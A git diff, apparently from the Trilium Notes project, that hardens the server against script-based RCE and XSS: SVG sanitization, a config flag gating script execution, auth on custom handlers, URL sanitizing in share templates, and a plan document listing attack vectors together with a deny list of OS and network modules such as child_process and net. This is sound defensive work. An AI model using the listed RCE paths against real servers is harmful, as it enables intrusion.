+                const content = image.getContent();
+                const sanitized = sanitizeSvg(typeof content === "string" ? content : content?.toString("utf-8") ?? "");
+                setSvgHeaders(res);
+                res.send(sanitized);
+            } else {
+                res.set("Content-Type", image.mime);
+                res.send(image.getContent());
+            }
         } else if (image.type === "canvas") {
             renderImageAttachment(image, res, "canvas-export.svg");
         } else if (image.type === "mermaid") {
@@ -250,9 +265,17 @@ function register(router: Router) {
         }
 
         if (attachment.role === "image") {
-            res.set("Content-Type", attachment.mime);
             addNoIndexHeader(attachment.note, res);
-            res.send(attachment.getContent());
+            if (attachment.mime === "image/svg+xml") {
+                // SVG attachments require sanitization to prevent stored XSS
+                const content = attachment.getContent();
+                const sanitized = sanitizeSvg(typeof content === "string" ? content : content?.toString("utf-8") ?? "");
+                setSvgHeaders(res);
+                res.send(sanitized);
+            } else {
+                res.set("Content-Type", attachment.mime);
+                res.send(attachment.getContent());
+            }
         } else {
             res.status(400).json({ message: "Requested attachment is not a shareable image" });
         }

apps/server/src/www.ts

@@ -12,6 +12,7 @@ import host from "./services/host.js";
 import buildApp from "./app.js";
 import type { Express } from "express";
 import { getDbSize } from "./services/sql_init.js";
+import { isScriptingEnabled } from "./services/scripting_guard.js";
 
 const MINIMUM_NODE_VERSION = "20.0.0";
 
@@ -81,6 +82,14 @@ async function displayStartupMessage() {
         log.info(`💻 CPU:         ${cpuModel} (${cpuInfos.length}-core @ ${cpuInfos[0].speed} Mhz)`);
     }
     log.info(`💾 DB size:     ${formatSize(getDbSize() * 1024)}`);
+
+    if (isScriptingEnabled()) {
+        log.info("WARNING: Script execution is ENABLED. Scripts have full server access including " +
+                 "filesystem, network, and OS commands. Only enable in trusted environments.");
+    } else {
+        log.info("Script execution is DISABLED. Set [Scripting] enabled=true in config.ini to enable.");
+    }
+
     log.info("");
 }
 

apps/website/package.json

@@ -9,7 +9,7 @@
 		"preview": "pnpm build && vite preview"
 	},
 	"dependencies": {
-		"i18next": "26.0.3",
+		"i18next": "26.0.4",
 		"preact": "10.29.1",
 		"preact-iso": "2.11.1",
 		"preact-render-to-string": "6.6.7",

docs/plans/2026-02-19-rce-hardening-design.md

@@ -0,0 +1,590 @@
+# RCE Hardening - Defense in Depth Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Prevent instant RCE from authenticated access by gating scripting behind a config flag, restricting `require()` to safe modules, adding auth to unauthenticated execution paths, and filtering dangerous attributes from sync.
+
+**Architecture:** Add a `[Scripting]` section to config.ini with `enabled=false` default for server mode. Gate all script execution entry points behind this flag. Restrict `ScriptContext.require()` to a whitelist. Add auth middleware to `/custom/*`. Filter dangerous attributes during sync (same pattern as import's `safeImport`).
+
+**Tech Stack:** TypeScript, Express middleware, Node.js `config.ini` system
+
+---
+
+## Task 1: Add `[Scripting]` config section
+
+**Files:**
+- Modify: `apps/server/src/services/config.ts` (add Scripting section to TriliumConfig, configMapping, and config object)
+- Modify: `apps/server/src/assets/config-sample.ini` (add [Scripting] section)
+
+**Step 1: Add Scripting section to TriliumConfig interface**
+
+In `config.ts`, add to the `TriliumConfig` interface after `Logging`:
+
+```typescript
+/** Scripting and code execution configuration */
+Scripting: {
+    /** Whether backend/frontend script execution is enabled (default: false for server, true for desktop) */
+    enabled: boolean;
+    /** Whether the SQL console is accessible (default: false) */
+    sqlConsoleEnabled: boolean;
+};
+```
+
+**Step 2: Add configMapping entries**
+
+Add after `Logging` in `configMapping`:
+
+```typescript
+Scripting: {
+    enabled: {
+        standardEnvVar: 'TRILIUM_SCRIPTING_ENABLED',
+        iniGetter: () => getIniSection("Scripting")?.enabled,
+        defaultValue: false,
+        transformer: transformBoolean
+    },
+    sqlConsoleEnabled: {
+        standardEnvVar: 'TRILIUM_SCRIPTING_SQLCONSOLEENABLED',
+        aliasEnvVars: ['TRILIUM_SCRIPTING_SQL_CONSOLE_ENABLED'],
+        iniGetter: () => getIniSection("Scripting")?.sqlConsoleEnabled,
+        defaultValue: false,
+        transformer: transformBoolean
+    }
+}
+```
+
+**Step 3: Add to config object**
+
+```typescript
+Scripting: {
+    enabled: getConfigValue(configMapping.Scripting.enabled),
+    sqlConsoleEnabled: getConfigValue(configMapping.Scripting.sqlConsoleEnabled)
+}
+```
+
+**Step 4: Update config-sample.ini**
+
+Add at the bottom:
+
+```ini
+[Scripting]
+# Enable backend/frontend script execution. WARNING: Scripts have full server access including
+# filesystem, network, and OS commands via require('child_process'). Only enable if you trust
+# all users with admin-level access to the server.
+# Desktop builds override this to true automatically.
+enabled=false
+
+# Enable the SQL console (allows raw SQL execution against the database)
+sqlConsoleEnabled=false
+```
+
+**Step 5: Commit**
+
+```
+feat(security): add [Scripting] config section with enabled=false default
+```
+
+---
+
+## Task 2: Create scripting guard utility
+
+**Files:**
+- Create: `apps/server/src/services/scripting_guard.ts`
+- Create: `apps/server/src/services/scripting_guard.spec.ts`
+
+**Step 1: Write tests**
+
+```typescript
+// scripting_guard.spec.ts
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
+
+describe("ScriptingGuard", () => {
+    it("should throw when scripting is disabled", async () => {
+        vi.doMock("./config.js", () => ({
+            default: { Scripting: { enabled: false, sqlConsoleEnabled: false } }
+        }));
+        const { assertScriptingEnabled } = await import("./scripting_guard.js");
+        expect(() => assertScriptingEnabled()).toThrow("disabled");
+    });
+
+    it("should not throw when scripting is enabled", async () => {
+        vi.doMock("./config.js", () => ({
+            default: { Scripting: { enabled: true, sqlConsoleEnabled: false } }
+        }));
+        const { assertScriptingEnabled } = await import("./scripting_guard.js");
+        expect(() => assertScriptingEnabled()).not.toThrow();
+    });
+
+    it("should throw for SQL console when disabled", async () => {
+        vi.doMock("./config.js", () => ({
+            default: { Scripting: { enabled: true, sqlConsoleEnabled: false } }
+        }));
+        const { assertSqlConsoleEnabled } = await import("./scripting_guard.js");
+        expect(() => assertSqlConsoleEnabled()).toThrow("disabled");
+    });
+});
+```
+
+**Step 2: Implement**
+
+```typescript
+// scripting_guard.ts
+import config from "./config.js";
+import { isElectron } from "./utils.js";
+
+/**
+ * Throws if scripting is disabled. Desktop (Electron) always allows scripting.
+ */
+export function assertScriptingEnabled(): void {
+    if (isElectron || config.Scripting.enabled) {
+        return;
+    }
+    throw new Error(
+        "Script execution is disabled. Set [Scripting] enabled=true in config.ini or " +
+        "TRILIUM_SCRIPTING_ENABLED=true to enable. WARNING: Scripts have full server access."
+    );
+}
+
+export function assertSqlConsoleEnabled(): void {
+    if (isElectron || config.Scripting.sqlConsoleEnabled) {
+        return;
+    }
+    throw new Error(
+        "SQL console is disabled. Set [Scripting] sqlConsoleEnabled=true in config.ini to enable."
+    );
+}
+
+export function isScriptingEnabled(): boolean {
+    return isElectron || config.Scripting.enabled;
+}
+```
+
+**Step 3: Run tests, verify pass**
+
+**Step 4: Commit**
+
+```
+feat(security): add scripting guard utility
+```
+
+---
+
+## Task 3: Gate script execution endpoints
+
+**Files:**
+- Modify: `apps/server/src/routes/api/script.ts` (add guard to exec, run, bundle endpoints)
+- Modify: `apps/server/src/routes/api/sql.ts` (add guard to execute endpoint)
+- Modify: `apps/server/src/routes/api/bulk_action.ts` (add guard to execute)
+
+**Step 1: Gate `POST /api/script/exec` and `POST /api/script/run/:noteId`**
+
+In `apps/server/src/routes/api/script.ts`, add at the top of `exec()` and `run()`:
+
+```typescript
+import { assertScriptingEnabled } from "../../services/scripting_guard.js";
+
+async function exec(req: Request) {
+    assertScriptingEnabled();
+    // ... existing code
+}
+
+function run(req: Request) {
+    assertScriptingEnabled();
+    // ... existing code
+}
+```
+
+**Step 2: Gate SQL console**
+
+In `apps/server/src/routes/api/sql.ts`, add at the top of `execute()`:
+
+```typescript
+import { assertSqlConsoleEnabled } from "../../services/scripting_guard.js";
+
+function execute(req: Request) {
+    assertSqlConsoleEnabled();
+    // ... existing code
+}
+```
+
+**Step 3: Gate bulk action executeScript**
+
+In `apps/server/src/services/bulk_actions.ts`, add guard inside the `executeScript` handler:
+
+```typescript
+import { assertScriptingEnabled } from "./scripting_guard.js";
+
+executeScript: (action, note) => {
+    assertScriptingEnabled();
+    // ... existing code
+}
+```
+
+**Step 4: Verify TypeScript compiles, run tests**
+
+**Step 5: Commit**
+
+```
+feat(security): gate script/SQL execution behind Scripting.enabled config
+```
+
+---
+
+## Task 4: Gate scheduler and event handler script execution
+
+**Files:**
+- Modify: `apps/server/src/services/scheduler.ts` (check isScriptingEnabled before running)
+- Modify: `apps/server/src/services/handlers.ts` (check isScriptingEnabled in runAttachedRelations)
+- Modify: `apps/server/src/routes/api/script.ts` (gate startup/widget bundle endpoints)
+
+**Step 1: Gate scheduler**
+
+In `scheduler.ts`, the `TRILIUM_SAFE_MODE` check already exists. Augment it with scripting check:
+
+```typescript
+import { isScriptingEnabled } from "./scripting_guard.js";
+
+sqlInit.dbReady.then(() => {
+    if (!process.env.TRILIUM_SAFE_MODE && isScriptingEnabled()) {
+        setTimeout(cls.wrap(() => runNotesWithLabel("backendStartup")), 10 * 1000);
+        setInterval(cls.wrap(() => runNotesWithLabel("hourly")), 3600 * 1000);
+        setInterval(cls.wrap(() => runNotesWithLabel("daily")), 24 * 3600 * 1000);
+        // ...
+    }
+});
+```
+
+**Step 2: Gate event handlers**
+
+In `handlers.ts`, wrap `runAttachedRelations` with a scripting check:
+
+```typescript
+import { isScriptingEnabled } from "./scripting_guard.js";
+
+function runAttachedRelations(note: BNote, relationName: string, originEntity: AbstractBeccaEntity<any>) {
+    if (!note || !isScriptingEnabled()) {
+        return;
+    }
+    // ... existing code
+}
+```
+
+**Step 3: Gate frontend startup/widget bundles**
+
+In `script.ts` (the route file), gate `getStartupBundles` and `getWidgetBundles`:
+
+```typescript
+import { isScriptingEnabled } from "../../services/scripting_guard.js";
+
+function getStartupBundles(req: Request) {
+    if (!isScriptingEnabled()) {
+        return { scripts: [], superScripts: [] };
+    }
+    // ... existing code
+}
+```
+
+**Step 4: Verify TypeScript compiles, run tests**
+
+**Step 5: Commit**
+
+```
+feat(security): gate scheduler, event handlers, and frontend bundles behind Scripting.enabled
+```
+
+---
+
+## Task 5: Add authentication to `/custom/*` routes
+
+**Files:**
+- Modify: `apps/server/src/routes/custom.ts` (add optional auth middleware)
+
+**Step 1: Add auth check with opt-out**
+
+The custom handler needs auth by default, but notes with `#customRequestHandlerPublic` label can opt out. Modify `handleRequest`:
+
+```typescript
+import auth from "./auth.js";
+import { isScriptingEnabled } from "../services/scripting_guard.js";
+
+function handleRequest(req: Request, res: Response) {
+    if (!isScriptingEnabled()) {
+        res.status(403).send("Script execution is disabled on this server.");
+        return;
+    }
+
+    // ... existing path parsing code ...
+
+    for (const attr of attrs) {
+        // ... existing matching code ...
+
+        if (attr.name === "customRequestHandler") {
+            const note = attr.getNote();
+
+            // Require authentication unless note has #customRequestHandlerPublic label
+            if (!note.hasLabel("customRequestHandlerPublic")) {
+                if (!req.session?.loggedIn) {
+                    res.status(401).send("Authentication required for this endpoint.");
+                    return;
+                }
+            }
+
+            // ... existing execution code ...
+        }
+    }
+}
+```
+
+**Step 2: Add `customRequestHandlerPublic` to builtin attributes**
+
+In `packages/commons/src/lib/builtin_attributes.ts`, add:
+
+```typescript
+{ type: "label", name: "customRequestHandlerPublic", isDangerous: true },
+```
+
+**Step 3: Verify TypeScript compiles**
+
+**Step 4: Commit**
+
+```
+feat(security): require auth for /custom/* handlers by default, add #customRequestHandlerPublic opt-out
+```
+
+---
+
+## Task 6: Restrict `require()` in ScriptContext
+
+**Files:**
+- Modify: `apps/server/src/services/script_context.ts` (add module whitelist)
+
+**Step 1: Add module whitelist**
+
+Replace the unrestricted `require()` fallback with a whitelist:
+
+```typescript
+// Modules that are safe for user scripts to require.
+// These do NOT provide filesystem, network, or OS access.
+const ALLOWED_MODULES = new Set([
+    // Trilium built-in modules (resolved via note titles, not Node require)
+    // -- these are handled before the fallback
+
+    // Safe utility libraries available in node_modules
+    "dayjs",
+    "marked",
+    "turndown",
+    "cheerio",
+    "axios",        // already exposed via api.axios, but scripts may require it directly
+    "xml2js",       // already exposed via api.xml2js
+    "escape-html",
+    "sanitize-html",
+    "lodash",
+
+    // Trilium-specific modules
+    "trilium:preact",
+    "trilium:api",
+]);
+
+// Modules that are BLOCKED even when scripting is enabled.
+// These provide OS-level access that makes RCE trivial.
+const BLOCKED_MODULES = new Set([
+    "child_process",
+    "cluster",
+    "dgram",
+    "dns",
+    "fs",
+    "fs/promises",
+    "net",
+    "os",
+    "path",
+    "process",
+    "tls",
+    "worker_threads",
+    "v8",
+    "vm",
+]);
+
+class ScriptContext {
+    // ... existing fields ...
+
+    require(moduleNoteIds: string[]) {
+        return (moduleName: string) => {
+            // First: check note-based modules (existing behavior)
+            const candidates = this.allNotes.filter((note) => moduleNoteIds.includes(note.noteId));
+            const note = candidates.find((c) => c.title === moduleName);
+
+            if (note) {
+                return this.modules[note.noteId].exports;
+            }
+
+            // Second: check blocked list
+            if (BLOCKED_MODULES.has(moduleName)) {
+                throw new Error(
+                    `Module '${moduleName}' is blocked for security. ` +
+                    `Scripts cannot access OS-level modules like child_process, fs, net, os.`
+                );
+            }
+
+            // Third: allow if in whitelist, otherwise block
+            if (ALLOWED_MODULES.has(moduleName)) {
+                return require(moduleName);
+            }
+
+            throw new Error(
+                `Module '${moduleName}' is not in the allowed modules list. ` +
+                `Contact your administrator to add it to the whitelist.`
+            );
+        };
+    }
+}
+```
+
+**Step 2: Verify TypeScript compiles, run tests**
+
+**Step 3: Commit**
+
+```
+feat(security): restrict require() in script context to whitelisted modules
+```
+
+---
+
+## Task 7: Filter dangerous attributes from sync
+
+**Files:**
+- Modify: `apps/server/src/services/sync_update.ts` (add dangerous attribute filtering)
+
+**Step 1: Add attribute filtering in `updateNormalEntity`**
+
+After `preProcessContent(remoteEC, remoteEntityRow)` at line 92, before `sql.replace()` at line 94, add:
+
+```typescript
+import attributeService from "./attributes.js";
+import { isScriptingEnabled } from "./scripting_guard.js";
+import log from "./log.js";
+
+// In updateNormalEntity, after preProcessContent:
+if (remoteEC.entityName === "attributes" && !isScriptingEnabled()) {
+    const attrRow = remoteEntityRow as { type?: string; name?: string; isDeleted?: number };
+    if (attrRow.type && attrRow.name && !attrRow.isDeleted &&
+        attributeService.isAttributeDangerous(attrRow.type, attrRow.name)) {
+        // Prefix dangerous attributes when scripting is disabled, same as safeImport
+        log.info(`Sync: disabling dangerous attribute '${attrRow.name}' (scripting is disabled)`);
+        (remoteEntityRow as any).name = `disabled:${attrRow.name}`;
+    }
+}
+```
+
+**Step 2: Verify TypeScript compiles**
+
+**Step 3: Commit**
+
+```
+feat(security): filter dangerous attributes from sync when scripting is disabled
+```
+
+---
+
+## Task 8: Restrict EJS share templates when scripting is disabled
+
+**Files:**
+- Modify: `apps/server/src/share/content_renderer.ts` (skip user EJS templates when scripting disabled)
+
+**Step 1: Add scripting check before EJS rendering**
+
+In `renderNoteContentInternal`, wrap the user template check:
+
+```typescript
+import { isScriptingEnabled } from "../services/scripting_guard.js";
+
+// In renderNoteContentInternal, around lines 200-229:
+if (note.hasRelation("shareTemplate") && isScriptingEnabled()) {
+    // ... existing EJS rendering code ...
+}
+```
+
+When scripting is disabled, user-provided EJS templates are silently ignored and the default template is used instead. This prevents the unauthenticated RCE via share templates.
+
+**Step 2: Verify TypeScript compiles**
+
+**Step 3: Commit**
+
+```
+feat(security): skip user EJS share templates when scripting is disabled
+```
+
+---
+
+## Task 9: Desktop auto-enable scripting
+
+**Files:**
+- Modify: `apps/server/src/services/config.ts` (override Scripting.enabled for Electron)
+
+**Step 1: Auto-enable for desktop**
+
+After the `config` object is built, add:
+
+```typescript
+import { isElectron } from "./utils.js";
+
+// At the bottom, before export:
+// Desktop builds always have scripting enabled (single-user trusted environment)
+if (isElectron) {
+    config.Scripting.enabled = true;
+    config.Scripting.sqlConsoleEnabled = true;
+}
+```
+
+Note: `isElectron` is already imported in utils.ts and is available. Alternatively, the `scripting_guard.ts` already checks `isElectron`, so this step may be redundant but makes the config object truthful.
+
+**Step 2: Check if `isElectron` is available in config.ts scope**
+
+If not available at module load time, the guard in `scripting_guard.ts` already handles this via `isElectron || config.Scripting.enabled`. This step can be skipped if circular import issues arise.
+
+**Step 3: Commit**
+
+```
+feat(security): auto-enable scripting for desktop builds
+```
+
+---
+
+## Task 10: Add log warnings when scripting is enabled
+
+**Files:**
+- Modify: `apps/server/src/services/scheduler.ts` or `apps/server/src/main.ts` (add startup warning)
+
+**Step 1: Add startup log**
+
+In the server startup path, after config is loaded:
+
+```typescript
+if (isScriptingEnabled()) {
+    log.info("WARNING: Script execution is ENABLED. Scripts have full server access including " +
+             "filesystem, network, and OS commands. Only enable in trusted environments.");
+}
+```
+
+**Step 2: Commit**
+
+```
+feat(security): log warning when scripting is enabled at startup
+```
+
+---
+
+## Summary of Protection Matrix
+
+| Attack Vector | Before | After (scripting=false) | After (scripting=true) |
+|---|---|---|---|
+| `POST /api/script/exec` | Full RCE | **Blocked (403)** | RCE with restricted require() |
+| `POST /api/bulk-action/execute` (executeScript) | Full RCE | **Blocked (403)** | RCE with restricted require() |
+| `POST /api/sql/execute` | SQL execution | **Blocked (403)** | SQL execution |
+| `ALL /custom/*` | Unauthenticated RCE | **Auth required + scripting blocked** | Auth required + restricted require() |
+| `GET /share/` (EJS template) | Unauthenticated RCE | **Default template only** | RCE (user templates allowed) |
+| `#run=backendStartup` notes | Auto-execute on restart | **Not executed** | Executed with restricted require() |
+| Event handlers (`~runOnNoteChange` etc.) | Auto-execute | **Not executed** | Executed with restricted require() |
+| Frontend startup/widget scripts | Auto-execute on page load | **Not sent to client** | Executed |
+| Sync: dangerous attributes | Applied silently | **Prefixed with `disabled:`** | Applied normally |
+| `require('child_process')` | Available | N/A (scripts don't run) | **Blocked** |
+| `require('fs')` | Available | N/A (scripts don't run) | **Blocked** |
+| Desktop (Electron) | Always enabled | Always enabled | Always enabled |

package.json

@@ -103,7 +103,7 @@
     "overrides": {
       "@codemirror/language": "6.12.3",
       "@lezer/highlight": "1.2.3",
-      "@lezer/common": "1.5.1",
+      "@lezer/common": "1.5.2",
       "mermaid": "11.14.0",
       "preact": "10.29.1",
       "roughjs": "4.6.6",
@@ -157,7 +157,7 @@
       "handlebars@<4.7.9": ">=4.7.9",
       "qs@<6.14.2": ">=6.14.2",
       "minimatch@<3.1.4": "^3.1.4",
-      "minimatch@3>brace-expansion": "^5.0.0",
+      "minimatch@3>brace-expansion": "^1.1.13",
       "serialize-javascript@<7.0.5": ">=7.0.5",
       "webpack@<5.104.1": ">=5.104.1",
       "file-type@>=13.0.0 <21.3.1": ">=21.3.1",

packages/commons/src/lib/builtin_attributes.ts

@@ -19,6 +19,7 @@ export default [
     { type: "label", name: "runOnInstance", isDangerous: false },
     { type: "label", name: "runAtHour", isDangerous: false },
     { type: "label", name: "customRequestHandler", isDangerous: true },
+    { type: "label", name: "customRequestHandlerPublic", isDangerous: true },
     { type: "label", name: "customResourceProvider", isDangerous: true },
     { type: "label", name: "widget", isDangerous: true },
     { type: "label", name: "noteInfoWidgetDisabled" },
@@ -107,8 +108,8 @@ export default [
     { type: "relation", name: "widget", isDangerous: true },
     { type: "relation", name: "renderNote", isDangerous: true },
     { type: "relation", name: "shareCss" },
-    { type: "relation", name: "shareJs" },
+    { type: "relation", name: "shareJs", isDangerous: true },
     { type: "relation", name: "shareHtml" },
-    { type: "relation", name: "shareTemplate" },
+    { type: "relation", name: "shareTemplate", isDangerous: true },
     { type: "relation", name: "shareFavicon" }
 ];

packages/share-theme/src/templates/page.ejs

@@ -100,7 +100,7 @@
 const logoWidth = subRoot.note.getLabelValue("shareLogoWidth") ?? 53;
 const logoHeight = subRoot.note.getLabelValue("shareLogoHeight") ?? 40;
 const mobileLogoHeight = logoHeight && logoWidth ? 32 / (logoWidth / logoHeight) : "";
-const shareRootLink = subRoot.note.hasLabel("shareRootLink") ? subRoot.note.getLabelValue("shareRootLink") : `./${subRoot.note.noteId}`;
+const shareRootLink = subRoot.note.hasLabel("shareRootLink") ? sanitizeUrl(subRoot.note.getLabelValue("shareRootLink") ?? "") : `./${subRoot.note.noteId}`;
 const headingRe = /(<h[1-6]>)(.+?)(<\/h[1-6]>)/g;
 const headingMatches = [...content.matchAll(headingRe)];
 content = content.replaceAll(headingRe, (...match) => {
@@ -181,7 +181,8 @@ content = content.replaceAll(headingRe, (...match) => {
                         const action = note.type === "book" ? "getChildNotes" : "getVisibleChildNotes";
                         for (const childNote of note[action]()) {
                             const isExternalLink = childNote.hasLabel("shareExternal") || childNote.hasLabel("shareExternalLink");
-                            const linkHref = isExternalLink ? childNote.getLabelValue("shareExternal") ?? childNote.getLabelValue("shareExternalLink") : `./${childNote.shareId}`;
+                            const rawHref = isExternalLink ? childNote.getLabelValue("shareExternal") ?? childNote.getLabelValue("shareExternalLink") : `./${childNote.shareId}`;
+                            const linkHref = isExternalLink ? sanitizeUrl(rawHref ?? "") : rawHref;
                             const target = isExternalLink ? ` target="_blank" rel="noopener noreferrer"` : "";
                         %>
                             <li>

packages/share-theme/src/templates/prev_next.ejs

@@ -57,6 +57,6 @@
 %>
 
 <div class="navigation">
-    <% if (previousNote) { %><a class="previous" href="./<%- previousNote.shareId %>"><%- previousNote.title %></a><% } %>
-    <% if (nextNote) { %><a class="next" href="./<%- nextNote.shareId %>"><%- nextNote.title %></a><% } %>
+    <% if (previousNote) { %><a class="previous" href="./<%= previousNote.shareId %>"><%= previousNote.title %></a><% } %>
+    <% if (nextNote) { %><a class="next" href="./<%= nextNote.shareId %>"><%= nextNote.title %></a><% } %>
 </div>

packages/share-theme/src/templates/tree_item.ejs

@@ -4,7 +4,7 @@ const isExternalLink = note.hasLabel("shareExternal");
 let linkHref;
 
 if (isExternalLink) {
-    linkHref = note.getLabelValue("shareExternal");
+    linkHref = sanitizeUrl(note.getLabelValue("shareExternal") ?? "");
 } else if (note.shareId) {
     linkHref = `./${note.shareId}`;
 }

pnpm-lock.yaml

@@ -7,7 +7,7 @@ settings:
 overrides:
   '@codemirror/language': 6.12.3
   '@lezer/highlight': 1.2.3
-  '@lezer/common': 1.5.1
+  '@lezer/common': 1.5.2
   mermaid: 11.14.0
   preact: 10.29.1
   roughjs: 4.6.6
@@ -61,7 +61,7 @@ overrides:
   handlebars@<4.7.9: '>=4.7.9'
   qs@<6.14.2: '>=6.14.2'
   minimatch@<3.1.4: ^3.1.4
-  minimatch@3>brace-expansion: ^5.0.0
+  minimatch@3>brace-expansion: ^1.1.13
   serialize-javascript@<7.0.5: '>=7.0.5'
   webpack@<5.104.1: '>=5.104.1'
   file-type@>=13.0.0 <21.3.1: '>=21.3.1'
@@ -187,8 +187,8 @@ importers:
   apps/build-docs:
     devDependencies:
       '@redocly/cli':
-        specifier: 2.25.4
-        version: 2.25.4(@opentelemetry/api@1.9.0)(bufferutil@4.0.9)(core-js@3.46.0)(encoding@0.1.13)(utf-8-validate@6.0.5)
+        specifier: 2.26.0
+        version: 2.26.0(@opentelemetry/api@1.9.0)(bufferutil@4.0.9)(core-js@3.46.0)(encoding@0.1.13)(utf-8-validate@6.0.5)
       archiver:
         specifier: 7.0.1
         version: 7.0.1
@@ -286,8 +286,8 @@ importers:
         specifier: 0.20.0
         version: 0.20.0(@types/react-dom@19.1.6(@types/react@19.1.7))(@types/react@19.1.7)(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(rxjs@7.8.2)
       '@zumer/snapdom':
-        specifier: 2.7.0
-        version: 2.7.0
+        specifier: 2.8.0
+        version: 2.8.0
       autocomplete.js:
         specifier: 0.38.1
         version: 0.38.1
@@ -316,8 +316,8 @@ importers:
         specifier: 1.51.2
         version: 1.51.2
       i18next:
-        specifier: 26.0.3
-        version: 26.0.3(typescript@6.0.2)
+        specifier: 26.0.4
+        version: 26.0.4(typescript@6.0.2)
       i18next-http-backend:
         specifier: 3.0.4
         version: 3.0.4(encoding@0.1.13)
@@ -359,7 +359,7 @@ importers:
         version: 10.29.1
       react-i18next:
         specifier: 17.0.2
-        version: 17.0.2(i18next@26.0.3(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2)
+        version: 17.0.2(i18next@26.0.4(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2)
       react-window:
         specifier: 2.2.7
         version: 2.2.7(react-dom@19.2.4(react@19.2.4))(react@19.2.4)
@@ -438,7 +438,7 @@ importers:
     dependencies:
       '@electron/remote':
         specifier: 2.1.3
-        version: 2.1.3(electron@41.1.1)
+        version: 2.1.3(electron@41.2.0)
       better-sqlite3:
         specifier: 12.8.0
         version: 12.8.0
@@ -495,8 +495,8 @@ importers:
         specifier: 14.0.0
         version: 14.0.0(webpack@5.105.4(esbuild@0.28.0))
       electron:
-        specifier: 41.1.1
-        version: 41.1.1
+        specifier: 41.2.0
+        version: 41.2.0
       prebuild-install:
         specifier: 7.1.3
         version: 7.1.3
@@ -551,8 +551,8 @@ importers:
         specifier: 14.0.0
         version: 14.0.0(webpack@5.105.4(esbuild@0.28.0))
       electron:
-        specifier: 41.1.1
-        version: 41.1.1
+        specifier: 41.2.0
+        version: 41.2.0
       fs-extra:
         specifier: 11.3.4
         version: 11.3.4
@@ -581,8 +581,8 @@ importers:
         specifier: ^1.12.1
         version: 1.29.0(zod@4.3.6)
       ai:
-        specifier: 6.0.153
-        version: 6.0.153(zod@4.3.6)
+        specifier: 6.0.154
+        version: 6.0.154(zod@4.3.6)
       better-sqlite3:
         specifier: 12.8.0
         version: 12.8.0
@@ -607,7 +607,7 @@ importers:
         version: 7.1.2
       '@electron/remote':
         specifier: 2.1.3
-        version: 2.1.3(electron@41.1.1)
+        version: 2.1.3(electron@41.2.0)
       '@triliumnext/commons':
         specifier: workspace:*
         version: link:../../packages/commons
@@ -738,8 +738,8 @@ importers:
         specifier: 5.0.1
         version: 5.0.1
       electron:
-        specifier: 41.1.1
-        version: 41.1.1
+        specifier: 41.2.0
+        version: 41.2.0
       electron-window-state:
         specifier: 5.0.3
         version: 5.0.3
@@ -783,8 +783,8 @@ importers:
         specifier: 9.0.0
         version: 9.0.0
       i18next:
-        specifier: 26.0.3
-        version: 26.0.3(typescript@6.0.2)
+        specifier: 26.0.4
+        version: 26.0.4(typescript@6.0.2)
       i18next-fs-backend:
         specifier: 2.6.3
         version: 2.6.3
@@ -898,8 +898,8 @@ importers:
   apps/website:
     dependencies:
       i18next:
-        specifier: 26.0.3
-        version: 26.0.3(typescript@6.0.2)
+        specifier: 26.0.4
+        version: 26.0.4(typescript@6.0.2)
       preact:
         specifier: 10.29.1
         version: 10.29.1
@@ -911,7 +911,7 @@ importers:
         version: 6.6.7(preact@10.29.1)
       react-i18next:
         specifier: 17.0.2
-        version: 17.0.2(i18next@26.0.3(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2)
+        version: 17.0.2(i18next@26.0.4(typescript@6.0.2))(react-dom@19.2.4(react@19.2.4))(react@19.2.4)(typescript@6.0.2)
     devDependencies:
       '@preact/preset-vite':
         specifier: 2.10.5
@@ -1330,7 +1330,7 @@ importers:
         version: 6.5.3(@codemirror/language@6.12.3)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)
       '@replit/codemirror-lang-nix':
         specifier: 6.0.1
-        version: 6.0.1(@codemirror/autocomplete@6.18.6)(@codemirror/language@6.12.3)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)(@lezer/common@1.5.1)(@lezer/highlight@1.2.3)(@lezer/lr@1.4.2)
+        version: 6.0.1(@codemirror/autocomplete@6.18.6)(@codemirror/language@6.12.3)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)(@lezer/common@1.5.2)(@lezer/highlight@1.2.3)(@lezer/lr@1.4.2)
       '@replit/codemirror-vim':
         specifier: 6.3.0
         version: 6.3.0(@codemirror/commands@6.10.3)(@codemirror/language@6.12.3)(@codemirror/search@6.6.0)(@codemirror/state@6.6.0)(@codemirror/view@6.41.0)
@@ -1479,8 +1479,8 @@ packages:
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/gateway@3.0.93':
-    resolution: {integrity: sha512-8D6C9eEvDq6IgrdlWzpbniahDkoLiieTCrpzH8p/Hw63/0iPnZJ1uZcqxHrDIVDW/+aaGhBXqmx5C7HSd2eMmQ==}
+  '@ai-sdk/gateway@3.0.94':
+    resolution: {integrity: sha512-uDDwLZhCkvC89crVS3S90D5L7AcVN8WriGuYVNYgVAaVcvy3Mthy3R9ICfzG75BObhz6pm2FWnhxDfNRK+t69Q==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -3615,8 +3615,8 @@ packages:
   '@keyv/serialize@1.1.1':
     resolution: {integrity: sha512-dXn3FZhPv0US+7dtJsIi2R+c7qWYiReoEh5zUntWCf4oSpMNib8FDhSoed6m3QyZdx5hK7iLFkYk3rNxwt8vTA==}
 
-  '@lezer/common@1.5.1':
-    resolution: {integrity: sha512-6YRVG9vBkaY7p1IVxL4s44n5nUnaNnGM2/AckNgYOnxTG2kWh1vR8BMxPseWPjRNpb5VtXnMpeYAEAADoRV1Iw==}
+  '@lezer/common@1.5.2':
+    resolution: {integrity: sha512-sxQE460fPZyU3sdc8lafxiPwJHBzZRy/udNFynGQky1SePYBdhkBl1kOagA9uT3pxR8K09bOrmTUqA9wb/PjSQ==}
 
   '@lezer/css@1.1.11':
     resolution: {integrity: sha512-FuAnusbLBl1SEAtfN8NdShxYJiESKw9LAFysfea1T96jD3ydBn12oYjaSG1a04BQRIUd93/0D8e5CV1cUMkmQg==}
@@ -4797,27 +4797,27 @@ packages:
